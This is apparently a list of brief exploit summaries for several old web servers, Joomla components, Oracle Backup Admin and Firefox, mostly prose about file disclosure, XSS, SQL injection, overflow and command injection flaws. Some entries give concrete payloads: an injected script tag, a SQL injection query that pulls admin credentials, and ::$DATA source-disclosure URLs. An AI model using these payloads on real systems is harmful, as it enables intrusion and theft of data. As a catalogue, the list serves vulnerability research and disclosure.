This exploit allows an attacker to access arbitrary files on a vulnerable Techlogica HTTP Server 1.03. The attacker can send a specially crafted HTTP request to the server, which will respond with the contents of the requested file.
The vulnerability is present in the http://[IPLocal]/3_1 page, where an attacker can inject a malicious SSID=1><script>alert(1)</script> and then execute the XSS by going to http://[IPLocal]/3_0
httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header. The vulnerability lies in httpd_src/http.cpp in h_readrequest() : snprintf(temp[1],MAX,client->host); An attacker can send a maliciously crafted Host header to the vulnerable server, which will cause a denial of service.
A vulnerability exists in Aurora Content Management System (Enterprise Edition) due to insufficient sanitization of user-supplied input in the 'AURORA_MODULES_FOLDER' parameter of the 'install.plugin.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious payload.
Invisible Browsing 5.0.52 is vulnerable to a buffer overflow vulnerability when handling specially crafted .ibkey files. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .ibkey file.
This exploit targets a vulnerability in the Joomla Component AlphaUserPoints. The vulnerability is a SQL injection vulnerability that allows an attacker to gain access to the admin account of the website. The exploit uses a specially crafted URL to inject a malicious SQL query into the vulnerable component. The query is then used to extract the admin username and email address from the database. The exploit also generates a token which can be used to log in as the admin.
The vulnerability exists in the 'Name' field of the Joomla Component Turtushout 0.11, which allows an attacker to inject malicious SQL queries. The malicious query used in this exploit is 'test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '
In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server. Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart authentication bypass and a trivial command injection, resulting in arbitrary command execution.
Firefox up through 3.0.13 had an obscure little function under window.pkcs11: long addmodule(in DOMString moduleName, in DOMString libraryFullPath, in long cryptoMechanismFlags, in long cipherFlags). Attacker doesn't get zero click install -- there's a dialog -- but: 1) Attacker does get to customize the dialog via moduleName 2) The dialog is modal, so the user doesn't get access to Firefox again until they hit OK (can't even close Firefox) 3) On Windows, he can put a UNC path in for the Library path. There's probably similar on OSX and some Linux distros. Even without, there's usually a way to get a file in a known location -- see John Heasman's Java work. LoadLibrary of Attacker library on OK.
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of the application available. This vulnerability is similar to the one reported earlier by Skull-HacKeR. Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure (download in this case) by the following means: http://[ webserver IP]/[ file ][::$DATA] http://172.16.2.101/default.asp::$DATA http://172.16.2.101/index.php::$DATA
Services By CQR